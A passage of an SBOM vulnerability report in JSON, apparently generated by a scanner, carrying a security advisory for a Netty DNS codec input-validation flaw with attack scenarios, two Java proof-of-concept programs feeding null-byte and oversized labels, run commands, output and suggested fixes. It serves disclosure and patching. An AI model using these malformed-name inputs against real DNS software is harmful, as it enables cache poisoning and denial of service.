          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-handler-proxy@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#a2591194-12ef-46d0-858a-41487d82f22f"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#a2591194-12ef-46d0-858a-41487d82f22f"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#a2591194-12ef-46d0-858a-41487d82f22f"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#a2591194-12ef-46d0-858a-41487d82f22f"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#a2591194-12ef-46d0-858a-41487d82f22f"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#a2591194-12ef-46d0-858a-41487d82f22f"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#a2591194-12ef-46d0-858a-41487d82f22f"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#14c38291-46e2-4e01-9229-115395dba7bf"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#14c38291-46e2-4e01-9229-115395dba7bf"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#14c38291-46e2-4e01-9229-115395dba7bf"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#14c38291-46e2-4e01-9229-115395dba7bf"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#14c38291-46e2-4e01-9229-115395dba7bf"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#14c38291-46e2-4e01-9229-115395dba7bf"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#14c38291-46e2-4e01-9229-115395dba7bf"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#658fc13b-6e73-47d9-9a42-98a078ae51b0"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#658fc13b-6e73-47d9-9a42-98a078ae51b0"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#658fc13b-6e73-47d9-9a42-98a078ae51b0"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#658fc13b-6e73-47d9-9a42-98a078ae51b0"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#658fc13b-6e73-47d9-9a42-98a078ae51b0"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#658fc13b-6e73-47d9-9a42-98a078ae51b0"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#658fc13b-6e73-47d9-9a42-98a078ae51b0"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#04f62eca-77ce-4bef-a53e-0e78f0af01f5"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#04f62eca-77ce-4bef-a53e-0e78f0af01f5"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#04f62eca-77ce-4bef-a53e-0e78f0af01f5"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#04f62eca-77ce-4bef-a53e-0e78f0af01f5"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#04f62eca-77ce-4bef-a53e-0e78f0af01f5"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#04f62eca-77ce-4bef-a53e-0e78f0af01f5"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#04f62eca-77ce-4bef-a53e-0e78f0af01f5"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#12546ff3-ebee-48e7-a197-e38fe353c5f4"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#12546ff3-ebee-48e7-a197-e38fe353c5f4"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#12546ff3-ebee-48e7-a197-e38fe353c5f4"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#12546ff3-ebee-48e7-a197-e38fe353c5f4"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#12546ff3-ebee-48e7-a197-e38fe353c5f4"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#12546ff3-ebee-48e7-a197-e38fe353c5f4"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#12546ff3-ebee-48e7-a197-e38fe353c5f4"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01df7f78-f921-4743-a5c8-91b8544887a0"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01df7f78-f921-4743-a5c8-91b8544887a0"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01df7f78-f921-4743-a5c8-91b8544887a0"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01df7f78-f921-4743-a5c8-91b8544887a0"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01df7f78-f921-4743-a5c8-91b8544887a0"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01df7f78-f921-4743-a5c8-91b8544887a0"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#01df7f78-f921-4743-a5c8-91b8544887a0"
        }
      ]
    },
    {
      "id": "CVE-2026-42579",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "description": "# Security Vulnerability Report: DNS Codec Input Validation Bypass in Netty (Encoder + Decoder)\n\n## 1. Vulnerability Summary\n\n| Field | Value |\n|-------|-------|\n| **Product** | Netty |\n| **Version** | 4.2.12.Final (and all prior versions with codec-dns) |\n| **Component** | `io.netty.handler.codec.dns.DnsCodecUtil` |\n| **Vulnerability Type** | CWE-20: Improper Input Validation / CWE-626: Null Byte Interaction Error / CWE-400: Uncontrolled Resource Consumption |\n| **Impact** | DNS Cache Poisoning / Domain Validation Bypass / Denial of Service / Malformed DNS Packets |\n\n## 2. Affected Components\n\nBoth the encoder and decoder in the same file are affected:\n\n- `io.netty.handler.codec.dns.DnsCodecUtil` \u2014 `encodeDomainName()` method (lines 31-51):\n  - No null byte validation in domain name labels\n  - No per-label length validation (RFC 1035 max: 63 bytes)\n  - No total domain name length validation (RFC 1035 max: 255 bytes)\n  - Empty labels silently truncate the domain name\n\n- `io.netty.handler.codec.dns.DnsCodecUtil` \u2014 `decodeDomainName()` method (lines 53-118):\n  - No per-label length validation (max 63)\n  - No total domain name length validation (max 255)\n  - Unbounded StringBuilder growth from attacker-controlled DNS responses\n\n## 3. Vulnerability Description\n\nNetty's DNS codec does **not enforce RFC 1035 domain name constraints** during either encoding or decoding. This creates a bidirectional attack surface: malicious DNS responses can exploit the decoder, and user-influenced hostnames can exploit the encoder.\n\n### 3.1 Encoder Side \u2014 Null Byte Injection (CWE-626)\n\nA domain name containing a null byte (e.g., `\"evil\\0.example.com\"`) is encoded with the null byte embedded in the label data. 
This creates a domain name that different DNS implementations interpret differently:\n\n- **Java (full string)**: sees `\"evil\\0.example.com\"` as a single label containing a null\n- **C/native DNS libraries**: truncate at the null byte, seeing only `\"evil\"`\n- **DNS servers**: may accept or reject based on implementation\n\nThis differential interpretation enables **DNS cache poisoning** and **domain validation bypass**.\n\n### 3.2 Encoder Side \u2014 Overlength Label (RFC 1035 Violation)\n\nLabels exceeding 63 bytes are accepted by the encoder. The length byte is written as a single unsigned byte, so a 200-byte label writes `0xC8` (200) as the length. Per RFC 1035, values 192-255 indicate **compression pointers**. This means:\n\n- A 200-byte label length `0xC8` would be interpreted as a **compression pointer** by standards-compliant DNS parsers\n- This creates **parser confusion** between label and pointer interpretation\n\n### 3.3 Encoder Side \u2014 Silent Truncation via Empty Labels\n\n```java\nencodeDomainName(\"a..b.com\", buf);\n// Encodes as: [01] 'a' [00]\n// Only \"a.\" is encoded, \".b.com\" is silently dropped!\n```\n\nAn attacker can craft input like `\"safe-domain..evil.com\"` which gets truncated to just `\"safe-domain.\"`, potentially bypassing domain allowlists.\n\n### 3.4 Decoder Side \u2014 Unbounded Memory Allocation\n\nThe decoder accepts labels of any length (0-255 bytes) without checking the RFC 1035 per-label limit of 63 bytes or the total domain name limit of 255 bytes. 
A malicious DNS server can return responses with oversized labels, causing excessive memory allocation.\n\n### Root Cause \u2014 Encoder\n\n```java\n// DnsCodecUtil.java:31-51\nstatic void encodeDomainName(String name, ByteBuf buf) {\n    if (ROOT.equals(name)) {\n        buf.writeByte(0);\n        return;\n    }\n    final String[] labels = name.split(\"\\\\.\");\n    for (String label : labels) {\n        final int labelLen = label.length();\n        if (labelLen == 0) {\n            break;  // NO ERROR - silently truncates!\n        }\n        // NO check: labelLen > 63\n        // NO check: label contains null bytes\n        // NO check: total name > 255 bytes\n        buf.writeByte(labelLen);                    // Can write values > 63!\n        ByteBufUtil.writeAscii(buf, label);         // Null bytes pass through!\n    }\n    buf.writeByte(0);\n}\n```\n\n### Root Cause \u2014 Decoder\n\n```java\n// DnsCodecUtil.java:94-99 (decodeDomainName)\n} else if (len != 0) {\n    if (!in.isReadable(len)) {  // Only checks if bytes EXIST, not if len <= 63\n        throw new CorruptedFrameException(\"truncated label in a name\");\n    }\n    name.append(in.toString(in.readerIndex(), len, CharsetUtil.UTF_8)).append('.');\n    //    ^^^^^^ StringBuilder grows WITHOUT any length limit\n    in.skipBytes(len);\n}\n```\n\n**Missing checks in decoder**:\n- No `if (len > 63)` check per RFC 1035 Section 2.3.4\n- No `if (name.length() > 255)` check for total domain name length\n\n## 4. Exploitability Prerequisites\n\n### Encoder Side (outbound)\n1. An application constructs DNS queries using Netty's DNS codec with user-influenced domain names\n2. The constructed DNS packets are sent to DNS servers or resolvers\n\n### Decoder Side (inbound)\n1. An application uses Netty's `codec-dns` or `resolver-dns` module to process DNS responses\n2. 
The application communicates with a malicious or compromised DNS server\n\n**Attack surface**: Any Netty application using DNS resolution (`DnsNameResolver`) is potentially affected on the decoder side, as DNS responses from the network are attacker-controlled. The encoder side requires user-controlled hostnames.\n\n## 5. Attack Scenarios\n\n### Scenario 1: DNS Cache Poisoning via Null Byte (Encoder)\n\n```java\nString hostname = userInput;  // \"evil\\0.trusted.com\"\nDnsQuery query = new DefaultDnsQuery(...)\n    .addRecord(DnsSection.QUESTION,\n        new DefaultDnsQuestion(hostname, DnsRecordType.A));\n```\n\nThe DNS query for `\"evil\\0.trusted.com\"` may be interpreted by some resolvers as a query for `\"evil\"` (truncated at null). If the attacker controls the DNS for `\"evil\"`, they can return a response that gets cached for `\"evil\\0.trusted.com\"` (or vice versa), poisoning the cache.\n\n### Scenario 2: Label/Pointer Confusion (Encoder)\n\nA 200-byte label writes length byte `0xC8`. Standards-compliant parsers interpret `0xC0-0xFF` as **compression pointer** prefixes (RFC 1035 Section 4.1.4). The resulting DNS packet is structurally ambiguous:\n\n```\nByte:  [C8] [61 61 61 ... (200 bytes)]\n         \u2191\n   Label interpretation: 200-byte label starting with 'a'\n   Pointer interpretation: pointer to offset 0x0861 = 2145\n```\n\n### Scenario 3: Memory Exhaustion via Large Labels (Decoder)\n\nA malicious DNS server returns a response with a 255-byte label (RFC limit: 63). Netty decodes it without error, creating a 260+ character String. 
With compression pointers, a small DNS response can cause megabytes of StringBuilder allocation.\n\n### Scenario 4: Domain Truncation via Empty Label (Encoder)\n\n```java\nencodeDomainName(\"safe-domain..evil.com\", buf);\n// Only \"safe-domain.\" is encoded, \"evil.com\" silently dropped\n```\n\nThis can bypass domain allowlists that check the input string.\n\n### Scenario 5: Downstream Processing Failures (Decoder)\n\nApplications that pass decoded domain names to other DNS libraries, certificate validators, or URL parsers may crash or behave incorrectly when receiving names > 255 bytes, as these systems typically assume RFC 1035 compliance.\n\n## 6. Proof of Concept\n\n### PoC 1: Encoder Null Byte and Overlength (DnsEncoderNullBytePoC.java)\n\n```java\nimport io.netty.buffer.ByteBuf;\nimport io.netty.buffer.Unpooled;\nimport java.lang.reflect.Method;\nimport java.nio.charset.StandardCharsets;\n\npublic class DnsEncoderNullBytePoC {\n    public static void main(String[] args) throws Exception {\n        System.out.println(\"=== Netty DNS Encoder Validation Bypass PoC ===\\n\");\n\n        Class<?> clazz = Class.forName(\"io.netty.handler.codec.dns.DnsCodecUtil\");\n        Method encode = clazz.getDeclaredMethod(\"encodeDomainName\",\n            String.class, ByteBuf.class);\n        encode.setAccessible(true);\n\n        // Test 1: Null byte in domain name\n        ByteBuf buf = Unpooled.buffer(256);\n        encode.invoke(null, \"evil\\0.example.com\", buf);\n        byte[] bytes = new byte[buf.readableBytes()];\n        buf.readBytes(bytes);\n        buf.release();\n        System.out.print(\"[TEST 1] Null byte - Encoded: \");\n        for (byte b : bytes) System.out.printf(\"%02x \", b & 0xff);\n        System.out.println(\"\\nVULNERABLE: Null byte 0x00 in label data!\");\n\n        // Test 2: 200-byte label\n        ByteBuf buf2 = Unpooled.buffer(512);\n        encode.invoke(null, \"a\".repeat(200) + \".com\", buf2);\n        System.out.println(\"\\n[TEST 
2] 200-byte label encoded: \" + buf2.readableBytes() + \" bytes\");\n        System.out.println(\"VULNERABLE: Overlength label accepted!\");\n        buf2.release();\n\n        // Test 3: Empty label truncation\n        ByteBuf buf3 = Unpooled.buffer(256);\n        encode.invoke(null, \"a..b.com\", buf3);\n        byte[] bytes3 = new byte[buf3.readableBytes()];\n        buf3.readBytes(bytes3);\n        buf3.release();\n        System.out.print(\"\\n[TEST 3] Empty label - Encoded: \");\n        for (byte b : bytes3) System.out.printf(\"%02x \", b & 0xff);\n        System.out.println(\"\\nVULNERABLE: Domain silently truncated!\");\n    }\n}\n```\n\n### PoC 2: Decoder Length Bypass (DnsDecoderLengthPoC.java)\n\n```java\nimport io.netty.buffer.ByteBuf;\nimport io.netty.buffer.Unpooled;\nimport java.lang.reflect.Method;\nimport java.nio.charset.StandardCharsets;\n\npublic class DnsDecoderLengthPoC {\n    public static void main(String[] args) throws Exception {\n        System.out.println(\"=== Netty DNS Decoder Length Bypass PoC ===\\n\");\n\n        Class<?> clazz = Class.forName(\"io.netty.handler.codec.dns.DnsCodecUtil\");\n        Method decode = clazz.getDeclaredMethod(\"decodeDomainName\", ByteBuf.class);\n        decode.setAccessible(true);\n\n        // Test 1: 100-byte label (RFC limit: 63)\n        ByteBuf buf1 = Unpooled.buffer(256);\n        buf1.writeByte(100);\n        buf1.writeBytes(\"a\".repeat(100).getBytes(StandardCharsets.US_ASCII));\n        buf1.writeByte(3);\n        buf1.writeBytes(\"com\".getBytes(StandardCharsets.US_ASCII));\n        buf1.writeByte(0);\n        String r1 = (String) decode.invoke(null, buf1);\n        buf1.release();\n        System.out.println(\"[TEST 1] 100-byte label: length=\" + r1.length() +\n            \" VULNERABLE=\" + (r1.length() > 64));\n\n        // Test 2: 5 x 60-byte labels = 305 bytes (RFC limit: 255)\n        ByteBuf buf2 = Unpooled.buffer(512);\n        for (int i = 0; i < 5; i++) {\n            
buf2.writeByte(60);\n            buf2.writeBytes(String.valueOf((char)('a'+i)).repeat(60)\n                .getBytes(StandardCharsets.US_ASCII));\n        }\n        buf2.writeByte(0);\n        String r2 = (String) decode.invoke(null, buf2);\n        buf2.release();\n        System.out.println(\"[TEST 2] 305-byte domain: length=\" + r2.length() +\n            \" VULNERABLE=\" + (r2.length() > 255));\n    }\n}\n```\n\n### How to Compile and Run\n\n```bash\nJARS=$(find ~/.m2/repository/io/netty -name \"netty-*.jar\" -path \"*/4.2.12.Final/*\" \\\n  | grep -v sources | grep -v javadoc | tr '\\n' ':')\n\n# Encoder PoC\njavac -cp \"$JARS\" DnsEncoderNullBytePoC.java\njava --add-opens java.base/java.lang=ALL-UNNAMED -cp \"$JARS:.\" DnsEncoderNullBytePoC\n\n# Decoder PoC\njavac -cp \"$JARS\" DnsDecoderLengthPoC.java\njava --add-opens java.base/java.lang=ALL-UNNAMED -cp \"$JARS:.\" DnsDecoderLengthPoC\n```\n\n### PoC Execution Output (Verified on Netty 4.2.12.Final)\n\n**Encoder PoC:**\n```\n=== Netty DNS Encoder Validation Bypass PoC ===\n\n[TEST 1] Null byte in domain name\n  Input: \"evil\\0.example.com\"\n  Encoded bytes: 05 65 76 69 6c 00 07 65 78 61 6d 70 6c 65 03 63 6f 6d 00\n  Null byte in label data: true\n  VULNERABLE: YES - Null byte accepted!\n\n[TEST 2] Label > 63 bytes in encoder\n  Input: \"aaaaaa...\" (200-char label)\n  Encoded bytes: 206\n  VULNERABLE: YES - Overlength label accepted in encoder!\n\n[TEST 3] Empty labels (consecutive dots)\n  Input: \"a..b.com\"\n  Encoded bytes: 01 61 00\n  Note: Empty label truncates the name (may lose data)\n```\n\n**Decoder PoC:**\n```\n=== Netty DNS Decoder Length Bypass PoC ===\n\n[TEST 1] Label > 63 bytes (RFC 1035 violation)\n  Label length: 100 bytes (RFC limit: 63)\n  Decoded name length: 105\n  VULNERABLE: YES - Label > 63 bytes accepted!\n\n[TEST 2] Domain > 255 bytes via multiple labels\n  5 labels x 60 bytes = 300+ bytes total\n  RFC 1035 limit: 255 bytes\n  Decoded name length: 305\n  VULNERABLE: YES - 
Domain > 255 bytes accepted!\n```\n\n## 7. Impact Analysis\n\n| Impact Category | Description |\n|----------------|-------------|\n| **Integrity** | HIGH \u2014 Null byte injection causes differential interpretation across DNS implementations |\n| **Availability** | HIGH \u2014 Malicious DNS responses can cause unbounded memory allocation via decoder |\n| **DNS Cache Poisoning** | Different parsers see different domain names from the same encoded packet |\n| **Domain Validation Bypass** | Null bytes can bypass allowlist/blocklist checks in DNS proxies |\n| **Label/Pointer Confusion** | Length bytes > 63 conflict with RFC 1035 compression pointer encoding |\n| **Silent Truncation** | Empty labels silently drop the remainder of the domain name |\n| **Downstream Failures** | Oversized domain names may crash certificate validators, URL parsers, or other DNS-aware libraries |\n\n## 8. Remediation Recommendations\n\n### Fix for Encoder (encodeDomainName)\n\n```java\nstatic void encodeDomainName(String name, ByteBuf buf) {\n    if (ROOT.equals(name)) {\n        buf.writeByte(0);\n        return;\n    }\n    int totalLength = 0;\n    final String[] labels = name.split(\"\\\\.\");\n    for (String label : labels) {\n        final int labelLen = label.length();\n        if (labelLen == 0) {\n            throw new IllegalArgumentException(\"DNS name contains empty label: \" + name);\n        }\n        if (labelLen > 63) {\n            throw new IllegalArgumentException(\n                \"DNS label length \" + labelLen + \" exceeds maximum of 63: \" + name);\n        }\n        for (int i = 0; i < label.length(); i++) {\n            if (label.charAt(i) == '\\0') {\n                throw new IllegalArgumentException(\n                    \"DNS label contains null byte at index \" + i);\n            }\n        }\n        totalLength += 1 + labelLen;\n        if (totalLength > 254) {\n            throw new IllegalArgumentException(\n                \"DNS name exceeds maximum 
length of 255: \" + name);\n        }\n        buf.writeByte(labelLen);\n        ByteBufUtil.writeAscii(buf, label);\n    }\n    buf.writeByte(0);\n}\n```\n\n### Fix for Decoder (decodeDomainName)\n\n```java\n// Add after \"} else if (len != 0) {\":\nif (len > 63) {\n    throw new CorruptedFrameException(\"DNS label length \" + len + \" exceeds maximum of 63\");\n}\n// Add after \"name.append(...)\":\nif (name.length() > 255) {\n    throw new CorruptedFrameException(\"DNS domain name length exceeds maximum of 255\");\n}\n```\n\nNote: the decoded string is one character shorter than the wire-format name (PoC 2, Test 1 writes 106 bytes and decodes to 105 characters), so RFC 1035's 255-octet limit corresponds to a decoded length of at most 254; `name.length() > 255` therefore still admits a name one octet over the limit. The snippets in this section are illustrative; the fixed releases carry the authoritative checks.\n\n## 9. Resources\n\n- [RFC 1035 Section 2.3.4: Size Limits](https://tools.ietf.org/html/rfc1035#section-2.3.4)\n- [RFC 1035 Section 4.1.4: Message Compression](https://tools.ietf.org/html/rfc1035#section-4.1.4)\n- [CWE-20: Improper Input Validation](https://cwe.mitre.org/data/definitions/20.html)\n- [CWE-400: Uncontrolled Resource Consumption](https://cwe.mitre.org/data/definitions/400.html)\n- [CWE-626: Null Byte Interaction Error](https://cwe.mitre.org/data/definitions/626.html)",
      "recommendation": "Upgrade io.netty:netty-codec-dns to version 4.2.13.Final, 4.1.133.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42579"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-cm33-6792-r9fm"
        },
        {
          "url": "https://tools.ietf.org/html/rfc1035#section-2.3.4"
        },
        {
          "url": "https://tools.ietf.org/html/rfc1035#section-4.1.4"
        }
      ],
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#3264dbd0-e25e-4ccb-87b9-d247a416e855"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#3264dbd0-e25e-4ccb-87b9-d247a416e855"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#3264dbd0-e25e-4ccb-87b9-d247a416e855"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#3264dbd0-e25e-4ccb-87b9-d247a416e855"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#5514a85e-c821-42bf-9e0a-f1a7e222ccfe"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#5514a85e-c821-42bf-9e0a-f1a7e222ccfe"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#5514a85e-c821-42bf-9e0a-f1a7e222ccfe"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#5514a85e-c821-42bf-9e0a-f1a7e222ccfe"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#59c95a13-e160-4455-99e4-0142b58d2cdd"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#59c95a13-e160-4455-99e4-0142b58d2cdd"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#59c95a13-e160-4455-99e4-0142b58d2cdd"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#59c95a13-e160-4455-99e4-0142b58d2cdd"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#64c1b9ea-24c6-4c88-883d-65525b50517f"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#64c1b9ea-24c6-4c88-883d-65525b50517f"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#64c1b9ea-24c6-4c88-883d-65525b50517f"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#64c1b9ea-24c6-4c88-883d-65525b50517f"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-dns@4.1.130.Final"
        },
        {
